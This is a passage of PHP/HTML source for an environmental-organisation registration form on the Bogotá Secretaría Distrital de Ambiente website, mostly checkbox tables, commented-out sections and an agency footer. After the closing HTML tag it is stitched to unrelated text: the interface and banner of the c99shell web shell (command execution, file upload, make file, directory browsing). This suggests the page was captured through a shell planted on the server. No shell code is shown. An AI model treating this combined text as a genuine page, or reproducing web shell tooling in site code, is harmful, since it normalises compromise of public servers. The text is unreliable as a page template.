                                                  Empresa privada </td>
                                                <td><input type="checkbox" name="tipos[]"  value="instituto_de_educacion_tecnologica" id="tipos">
                                                  Instituto de educaci&oacute;n tecnol&oacute;gica </td>
                                              </tr>
                                              <tr>
                                                <td><input type="checkbox" name="tipos[]"  value="organizacion_publica" id="tipos">
                                                  Organizaci&oacute;n p&uacute;blica</td>
                                                <td><input type="checkbox" name="tipos[]"  value="instituto_de_educacion_universitaria" id="tipos">
                                                  Instituto de educaci&oacute;n universitaria </td>
                                              </tr>
                                              <tr>
                                                <td><input type="checkbox" name="tipos[]"  value="organizacion_privada" id="tipos">
                                                  Organizaci&oacute;n privada</td>
                                                
                                              </tr>
                                              <tr>
                                                
                                              </tr>
                                            </table></td>
                                        </tr> 
                                        
                                        <tr> 
                                          <td colspan="2"><hr size="1" noshade></td>
                                        </tr> 
                                        
                                        <tr> 
                                          <td align="right"><strong>*Temas de trabajo</strong></td>
                                          <td><table width="100%" border="0" cellspacing="0" cellpadding="3" style="font-size:11px">
                                              <tr>
                                                <td width="49%"><input type="checkbox" name="temas_11" value="k" id="temas">
                                                  Producci&oacute;n limpia </td>
                                                <td><input type="checkbox" name="temas_3" value="c" id="temas">
                                                  Humedales</td>
                                              </tr>
                                              <tr>
                                                <td><input type="checkbox" name="temas_5" value="e" id="temas">
                                                  Desarrollo Rural p&aacute;ramos</td>
                                                <td><input type="checkbox" name="temas_7" value="g" id="temas">
                                                  Bosques</td>
                                              </tr>
                                              <tr> 
                                                <td><input type="checkbox" name="temas_4" value="d" id="temas">
                                                  Pol&iacute;tica ambiental </td>
                                                <td><input type="checkbox" name="temas_9" value="i" id="temas">
                                                  Flora y fauna</td>
                                                
                                              </tr>
                                              <tr>
                                                <td width="51%"><input type="checkbox" name="temas_2" value="b" id="temas">
                                                  Participaci&oacute;n </td>
                                                <td><input type="checkbox" name="temas_13" value="m" id="temas">
                                                  Residuos s&oacute;lidos </td>
                                                
                                              </tr>
                                              <tr>
                                                <td><input type="checkbox" name="temas_1" value="aa" id="temas">
                                                  Recuperaci&oacute;n</td>
                                                <td><input type="checkbox" name="temas_8" value="h" id="temas">
                                                  Medios de comunicacion ambiental</td>
                                                
                                              </tr>
                                              <tr> 
                                                <td><input type="checkbox" name="temas_10" value="jj" id="temas">
                                                  Ecosistemas</td>
                                                <td><input type="checkbox" name="temas_10" value="j" id="temas">
                                                  Espacio p&uacute;blico</td>
                                                
                                              </tr>
                                              <tr>
                                                <td><input type="checkbox" name="temas_6" value="f" id="temas">
                                                  Veedur&iacute;as </td>
                                                <td><input type="checkbox" name="temas_12" value="l" id="temas">
                                                  Financiamiento </td>
                                                
                                              </tr>
                                              <tr>
                                                <td><input type="checkbox" name="temas_1" value="a" id="temas">
                                                  Recuperaci&oacute;n conservaci&oacute;n cuencas</td>
                                                <td><input type="checkbox" name="temas_14" value="n" id="temas" onclick="habilitar1();">
                                                  Otros 
                                                  <input name="otros_temas" type="text" id="otros_temas" size="15" maxlength="80" disabled> 
                                                </td>
                                              </tr>
                                            </table></td> -->
                                            <input type="hidden" name="temas[]"  value="N/A" id="temas">
                                        </tr>
                                        <tr> 
                                          <td colspan="2"> <!--<hr size="1" noshade></td> -->
                                        </tr>
                                        <tr> <!--
                                          <td align="right"><strong>*Actividades</strong></td>
                                          <td><table width="100%" border="0" cellspacing="0" cellpadding="3" style="font-size:11px">
                                              <tr> 
                                                <td width="49%"><input type="checkbox" name="actividades[]"  value="intervencion_directa" id="actividades">
                                                  Intervenci&oacute;n directa</td>
                                                <td><input type="checkbox" name="actividades[]"  value="trabajo en red" id="actividades">
                                                  Trabajo en red </td>
                                              </tr>
                                              <tr>
                                                <td><input type="checkbox" name="actividades[]"  value="promocion" id="actividades">
                                                  Promoci&oacute;n </td>
                                                <td><input type="checkbox" name="actividades[]"  value="coordinacion_investigacion" id="actividades">
                                                  Coordinaci&oacute;n Investigaci&oacute;n </td>
                                              </tr>
                                              <tr>
                                                <td><input type="checkbox" name="actividades[]"  value="investigacion" id="actividades">
                                                  Investigaci&oacute;n </td>
                                                <td><input type="checkbox" name="actividades[]"  value="fortalecimiento_capacidades" id="actividades">
                                                  Fortalecimiento capacidades </td>
                                              </tr>
                                              <tr> 
                                                <td><input type="checkbox" name="actividades[]"  value="formacion" id="actividades">
                                                  Formaci&oacute;n</td>
                                                <td><input type="checkbox" name="actividades[]"  value="financiamiento" id="actividades">
                                                  Financiamiento</td>
                                              </tr>
                                              <tr> 
                                                    <td>&nbsp;</td>
                                                  </tr>
                                            
                                              <tr>
                                                <td width="51%"><input type="checkbox" name="actividades[]" value="apoyo_proyectos" id="actividades">
                                                  Apoyo a proyectos </td>
                                                <td><input type="checkbox" name="actividades[]"  value="otros" onclick="habilitar2();" id="actividades">
                                                  Otros 
                                                  <input name="otros_actividades" type="text" id="otros_actividades" size="15" maxlength="80" disabled></td>
                                              </tr>
                                              <tr>
                                                <td><input type="checkbox" name="actividades[]"  value="grupos de presion" id="actividades">
                                                  Grupos de presi&oacute;n </td>
                                                
                                              </tr>
                                              <tr>
                                                <td width="49%"><input type="checkbox" name="actividades[]" value="intercambio_informaciones" id="actividades">
                                                  Intercambio de informaci&oacute;n</td>
                                              </tr>
                                              <tr>
                                                <td colspan="2">Organizaciones 
                                                  integradas a la red
                                                  <input name="organizaciones_integradas" type="text" id="organizaciones_integradas" size="20" maxlength="80"></td>
                                              </tr>
                                            </table></td>
                                        </tr>
                                        <tr> 
                                          <td colspan="2"><hr size="1" noshade></td>
                                        </tr>
                                        <tr>  -->
                                        <input type="hidden" name="actividades[]"  value="N/A" id="tipos">
                                        <!--  
                                          <td align="right"> <br> <br> <br><strong>
                                            *Fuentes de financiaci&oacute;n</strong><br> <br> <br> <br> 
                                            <br> <br> <br> </td>
                                          <td><table width="100%" border="0" cellspacing="0" cellpadding="3" style="font-size:11px">
                                              <tr>
                                                 <td width="49%"><input type="checkbox" name="financiamientos[]" value="Organizacion Internacional" id="financiamientos">
                                                  Organizacion Internacional</td>
                                                 <td width="51%"><input type="checkbox" name="financiamientos[]" value="Donaciones" id="financiamientos">
                                                  Donaciones</td>
                                                                                              
                                              </tr>
                                              <tr> 
                                                <td><input type="checkbox" name="financiamientos[]" value="Gobierno Nacional" id="financiamientos">
                                                  Gobierno Nacional </td>
                                                <td><input type="checkbox" name="financiamientos[]" value="Empresa privada" id="financiamientos">
                                                  Empresa privada</td>
                                                
                                              </tr>
                                              <tr> 
                                                <td><input type="checkbox" name="financiamientos[]" value="Gobierno departamental" id="financiamientos">
                                                  Gobierno departamental</td>
                                                <td width="49%"><input type="checkbox" name="financiamientos[]" value="Org. recaudadora de fondos" id="financiamientos">
                                                  Org. recaudadora de fondos</td>
                                              </tr>
                                              <tr> 
                                                <td><input type="checkbox" name="financiamientos[]" value="Gobierno Distrital" id="financiamientos">
                                                  Gobierno Distrital</td>
                                                <td width="51%"><input type="checkbox" name="financiamientos[]" value="Venta material producido" id="financiamientos">
                                                  Venta material producido</td>
                                              </tr>
                                              <tr> 
                                                <td><input type="checkbox" name="financiamientos[]" value="Gobierno Local" id="financiamientos">
                                                  Gobierno Local</td>
                                                <td><input type="checkbox" name="financiamientos[]" value="Colectividad local" id="financiamientos">
                                                  Colectividad local</td>
                                              </tr>
                                              <tr> 
                                                <td><input type="checkbox" name="financiamientos[]" value="checkbox" onclick="habilitar3();" id="financiamientos">
                                                  Otros 
                                                  <input name="otros_financiamientos" type="text" id="otros_financiamientos" size="15" maxlength="80" disabled> 
                                                  &nbsp;</td>
                                              </tr>
                                              
                                              <tr>
                                                
                                                <td>&nbsp;</td>
                                              </tr>
                                            </table></td>
                                        </tr>
                                        <tr> 
                                          <td colspan="2"><hr size="1" noshade></td>
                                        </tr>
                                        <tr> 
                                        -->
                                        <input type="hidden" name="financiamentos[]"  value="N/A" id="tipos">
                                        <!--
                                          <td align="right"><strong> *Material producido</strong><br> 
                                            <br> </td>
                                          <td><table width="100%" border="0" cellspacing="0" cellpadding="3" style="font-size:11px">
                                              <tr> 
                                                <td width="49%"><input type="checkbox" name="material[]" value="Material Audiovisual" id="material">
                                                  Material Audiovisual</td>
                                                <td width="51%"><input type="checkbox" name="material[]" value="Boletín de informativo" id="material">
                                                  Bolet&iacute;n informativo</td>
                                              </tr>
                                              <tr> 
                                                <td><input type="checkbox" name="material[]" value="Informes" id="material">
                                                  Informes</td>
                                                <td><input type="checkbox" name="material[]" value="Programa de Radio" id="material">
                                                  Programa de Radio</td>
                                              </tr>
                                              <tr> 
                                                <td><input type="checkbox" name="material[]" value="Publicaciones" id="material">
                                                  Publicaciones</td>
                                                <td><input type="checkbox" name="material[]" value="Periódico" id="material">
                                                  Peri&oacute;dico</td>
                                              </tr>
                                              <tr> 
                                                <td><input type="checkbox" name="material[]" value="Sitio Internet" id="material">
                                                  Sitio Internet</td>
                                                <td><input type="checkbox" name="material[]" value="Otros" onClick="habilitar4();"  id="material">
                                                  Otros 
                                                  <input name="otros_materiales" type="text" id="otros_materiales" size="15" maxlength="80" disabled></td>
                                              </tr>
                                            </table></td>
                                        </tr>
                                        <tr> 
                                          <td colspan="2"><hr size="1" noshade></td>
                                        </tr>
                                        <tr> -->
                                        <input type="hidden" name="material[]"  value="N/A" id="material">
                                        <!--
                                          <td align="right"><strong> *Misi&oacute;n </strong></td>
                                          <td><textarea name="mision" id="mision" cols="40" rows="5"></textarea></td>
                                        </tr>
                                        -->
                                        <input type="hidden" name="mision"  value="N/A" id="mision">
                                        <!--
                                        <tr> 
                                          <td align="right"><strong>*Visi&oacute;n</strong></td>
                                          <td><textarea name="vision" id="vision" cols="40" rows="5"></textarea></td>
                                        </tr>
                                        -->
                                        <input type="hidden" name="vision"  value="N/A" id="vision">
                                        <tr> 
                                          <td align="right"><strong>*Ingrese c&oacute;digo</strong></td>
                                          <td> <input name="verif_box" type="text" id="verif_box" style="font-family:Verdana, Arial, Helvetica, sans-serif; font-size:10px;" maxlength="4"/> 
                                            <img src="verificationimage.php?<?php echo rand(0,9999);?>" alt="código de verificacion" width="50" height="24" align="absbottom" /></td>
                                        </tr>
                                      </table>
 </fieldset>

                                      <br>
                                      <br>
                                      <div align="center"><input type="submit" name="Submit2" value="Enviar registro">
                                      <!-- <input type="reset" name="Submit22" value="Borrar datos">--></div>
                                     <br></form></div></fieldset></td>
                              </tr> </table></td></tr><tr> 
                          <td height="80" colspan="2" align="center" valign="middle" class="amarillo"><font size="1"><font face="Verdana, Arial"><strong>Secretar&iacute;a 
                            Distrital de Ambiente</strong></font></span><font face="Verdana, Arial"><br>
                            Cra. 6 No. 14 - 98 Pisos 2, 5, 6, 7 y 12 Torre A y 
                            piso 3 y 4 Torre B, Edificio Condominio Parque Santander 
                            - Conmutador: 4441030 <br>
                            Bogot&aacute; - Colombia<br>
                            <a href="mailto:webmaster@secretariadeambiente.gov.co">webmaster@secretariadeambiente.gov.co</a></font></font></td>
                        </tr>
                      </table></TD>
                  </TR>
                </TBODY>
              </TABLE></TD>
          </TR>
        </TBODY>
      </TABLE></td><td style="background-image:url(http://www.secretariadeambiente.gov.co/sda/libreria/jpg/new/rightShadow.jpg); background-repeat:repeat-y" width="14"></td></tr></table>
<map name="Map">
  <area shape="rect" coords="6,8,77,19" href="http://www.secretariadeambiente.gov.co/sda/libreria/php/decide.php?patron=01." alt="Secretar&iacute;a de Ambiente">
  <area shape="rect" coords="266,6,408,20" href="http://www.secretariadeambiente.gov.co/sda/libreria/php/decide.php?patron=02." alt="Servicios al Ciudadano">
  <area shape="rect" coords="98,6,240,21" href="http://www.secretariadeambiente.gov.co/sda/libreria/php/decide.php?patron=03.">
  <area shape="rect" coords="433,7,514,20" href="http://www.secretariadeambiente.gov.co/sda/libreria/php/decide.php?patron=05." alt="En l&iacute;nea">
</map></BODY></HTML>


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--